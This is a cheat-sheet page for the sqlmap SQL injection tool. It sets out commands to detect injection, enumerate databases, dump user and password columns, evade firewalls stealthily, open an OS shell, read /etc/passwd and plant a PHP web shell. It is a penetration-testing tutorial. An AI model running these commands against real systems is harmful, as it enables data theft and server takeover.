Skip to content
>_devvkit
$devvkit learn --librarie sqlmap-guide

sqlmap Guide

[security][database][sql-injection][pentest]
Security & Cryptography
Install
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
cd sqlmap-dev
python sqlmap.py
# Or:
pip install sqlmap
# Or Docker:
docker pull sqlmapproject/sqlmap

sqlmap automatically detects and exploits SQL injection vulnerabilities. It fingerprints the database (MySQL, PostgreSQL, Oracle, MSSQL, SQLite), enumerates tables/columns, dumps data, and can even gain OS shell access via `xp_cmdshell` or `INTO OUTFILE`.

Start with a request file from Burp/ZAP: `-r request.txt`. Or pass the URL with `-u`, cookie with `--cookie`, and POST body with `--data`. Use `--batch` for non-interactive mode and `--level` (1-5) / `--risk` (1-3) to control aggressiveness.

sqlmap supports time-based blind, error-based, boolean blind, and UNION injection techniques. Use `--technique` to limit to specific types (e.g., `--technique=TIME` for slow but stealthy). WAF bypass options include `--tamper=space2comment` and `--random-agent`.

Detection

Basic detectionTest URL for SQLi.
sqlmap -u "https://example.com/page?id=1" --batch
sqlmap -u "https://example.com/page?id=1" --cookie="session=abc123"
sqlmap -u "https://example.com/login" --data="user=admin&pass=test" --batch
Request fileUse captured request.
# Capture request from Burp/ZAP → save as request.txt
sqlmap -r request.txt --batch

# Or combine with specific parameter:
sqlmap -r request.txt -p "id,category" --batch

Enumeration

Database fingerprintIdentify DB type and version.
sqlmap -u "https://example.com/page?id=1" --banner --batch
sqlmap -u "https://example.com/page?id=1" --hostname --batch
sqlmap -u "https://example.com/page?id=1" --current-user --current-db --batch
sqlmap -u "https://example.com/page?id=1" --is-dba --batch    # Check if DB admin
List tablesEnumerate all tables.
sqlmap -u "https://example.com/page?id=1" --tables --batch
sqlmap -u "https://example.com/page?id=1" -D database_name --tables --batch
sqlmap -u "https://example.com/page?id=1" --columns -T users --batch
sqlmap -u "https://example.com/page?id=1" --schema --batch  # Full DB schema

Data Extraction

Dump dataExtract table data.
sqlmap -u "https://example.com/page?id=1" --dump -T users --batch
sqlmap -u "https://example.com/page?id=1" --dump-all --batch     # All tables
sqlmap -u "https://example.com/page?id=1" --dump -T users \
  --stop 10 --start 1  # First 10 rows only
sqlmap -u "https://example.com/page?id=1" --dump -C "username,password" -T users

Evasion

WAF bypass techniquesTamper scripts.
sqlmap -u "https://example.com/page?id=1" --tamper=space2comment --batch
sqlmap -u "https://example.com/page?id=1" --tamper=between --random-agent
sqlmap -u "https://example.com/page?id=1" --tamper=charencode --batch

# List all tampers:
ls /usr/share/sqlmap/tamper/

# Chain tampers:
sqlmap -u "..." --tamper="between,randomcase,space2comment"
Tune speed vs stealthControl aggressiveness.
# Faster (noisier):
sqlmap -u "..." --threads=10 --technique=ERROR --batch

# Stealthy (slower):
sqlmap -u "..." --technique=TIME --time-sec=2 --delay=1 --batch
# --technique options: B: Boolean, E: Error, U: Union, S: Stacked, T: Time, Q: Inline

Advanced

OS shellGet command execution.
sqlmap -u "https://example.com/page?id=1" --os-shell --batch
# Only works if: DBA privileges + MySQL/MSSQL
# Gives interactive OS shell

# File read/write:
sqlmap -u "https://example.com/page?id=1" --file-read=/etc/passwd
sqlmap -u "https://example.com/page?id=1" --file-write=shell.php --file-dest=/var/www/html/shell.php